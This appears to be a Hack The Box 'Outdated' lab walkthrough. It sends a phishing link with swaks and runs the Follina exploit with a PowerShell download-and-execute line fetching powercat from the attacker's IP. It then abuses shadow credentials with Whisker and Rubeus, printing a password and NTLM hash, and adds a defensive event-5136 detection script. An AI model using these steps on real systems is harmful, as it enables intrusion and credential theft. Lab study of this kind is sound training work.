
# Foothold

Send a test email containing a link to our web server to see whether the link gets visited:

```bash
adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<-  220 mail.outdated.htb ESMTP
 -> EHLO pwndot
<-  250-mail.outdated.htb
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<anton@adot8.com>
<-  250 OK
 -> RCPT TO:<itsupport@outdated.htb>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Thu, 27 Feb 2025 07:11:58 -0600
 -> To: itsupport@outdated.htb
 -> From: anton@adot8.com
 -> Subject: Internal Web App
 -> Message-Id: <20250227071158.449184@pwndot>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 ->
 -> http://10.10.14.18
 ->
 ->
 -> .
<-  250 Queued (10.890 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

```

```bash
adot@pwndot:~/htb/outdated$ updog -p 80
[+] Serving /home/adot/htb/outdated...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.2.228:80
Press CTRL+C to quit
10.10.11.175 - - [27/Feb/2025 07:12:15] "GET / HTTP/1.1" 200 -

```

We can leverage the MS-MSDT "Follina" vulnerability (CVE-2022-30190):

<figure><img src="/files/aavB7ZklyAOotkukMjQ0" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/chvancooten/follina.py.git>" %}

```bash
adot@pwndot:~/htb/outdated/follina.py$ python follina.py -m command -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.18/powercat.ps1')" -t rtf -u 10.10.14.18
Generated 'clickme.rtf' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://10.10.14.18:80/exploit.html
```

```bash
adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18/exploit.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<-  220 mail.outdated.htb ESMTP
<SNIP>
```

<figure><img src="/files/m1m31G2VAApgGF37r0WV" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/gu3pyWiH7N3bvdHXAtR4" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HNebbx93wfuhyrYyoW4A" alt=""><figcaption></figcaption></figure>

```
btables:GHKKb7GEHcccdCT8tQV2QwL3
```

```powershell
PS C:\Users\btables> whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ==================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                      Mandatory group, Enabled by default, Enabled group
OUTDATED\ITStaff                           Group            S-1-5-21-4089647348-67660539-4016542185-1107 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                        

```

```powershell
PS C:\Users\btables> .\SharpHound.exe -c all
.\SharpHound.exe -c all
2025-02-27T21:42:44.6514857-08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2025-02-27T21:42:44.8858990-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote

```

<figure><img src="/files/jejhgmaPnBtpfpwlB7I0" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/eladshamir/Whisker>" %}

Compile Whisker, upload it to the target and run it:

```
PS C:\Users\btables> iwr 10.10.14.18/Whisker.exe -o whisker.exe
iwr 10.10.14.18/Whisker.exe -o whisker.exe
PS C:\Users\btables> .\Whisker.exe add /target:sflowers
.\Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password NzycSJ15jTkcosRW
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 8b9c4eac-1869-4bdb-aae5-9a660ffde5e2
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:sflowers /certificate:<SNIP>
```

```
Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzC... /password:"NzycSJ15jTkcosRW" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
```
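On the defensive side, the `msDS-KeyCredentialLink` update that Whisker reports above is recorded on the domain controller as Security event 5136, provided Directory Service Changes auditing and a matching SACL are in place. The following is an added example (not from the original page or the Whisker project) that filters such events for writers outside an allowlist; the sample events, the `svc-aadsync` account name and the function name are constructed assumptions.

```python
KEY_ATTR = "msds-keycredentiallink"

# Event 5136 reports the operation as a message code.
OPERATIONS = {"%%14674": "value added", "%%14675": "value deleted"}

# Assumption: accounts expected to manage key credentials in this
# environment (hypothetical sync service account name).
EXPECTED_WRITERS = {"svc-aadsync"}

# Constructed sample events shaped like the EventData of Security event 5136.
# Values reuse names shown on this page; they are not real log lines.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "btables",
     "ObjectDN": "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "svc-aadsync",
     "ObjectDN": "CN=Example User,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "btables",
     "ObjectDN": "CN=Example User,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "description",
     "OperationType": "%%14674"},
    {"EventID": 4624, "SubjectUserName": "btables"},
]


def find_key_credential_writes(events, expected_writers=EXPECTED_WRITERS):
    """Return one finding per unexpected write to msDS-KeyCredentialLink."""
    expected = {w.lower() for w in expected_writers}
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue  # only directory object modifications
        if ev.get("AttributeLDAPDisplayName", "").lower() != KEY_ATTR:
            continue  # some other attribute was changed
        writer = ev.get("SubjectUserName", "")
        if writer.lower() in expected:
            continue  # allowlisted writer
        findings.append({
            "target": ev.get("ObjectDN", ""),
            "writer": writer,
            "operation": OPERATIONS.get(ev.get("OperationType"), "unknown"),
        })
    return findings


if __name__ == "__main__":
    for finding in find_key_credential_writes(SAMPLE_EVENTS):
        print(finding)
```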

<figure><img src="/files/gxY0EciDyIIimjZeTgZj" alt=""><figcaption></figcaption></figure>

```
sflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5
```

<figure><img src="/files/t5STVDZqWrkTFDkhyUOq" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9VAMJJUN8mhdwQYsMgsH" alt=""><figcaption></figcaption></figure>


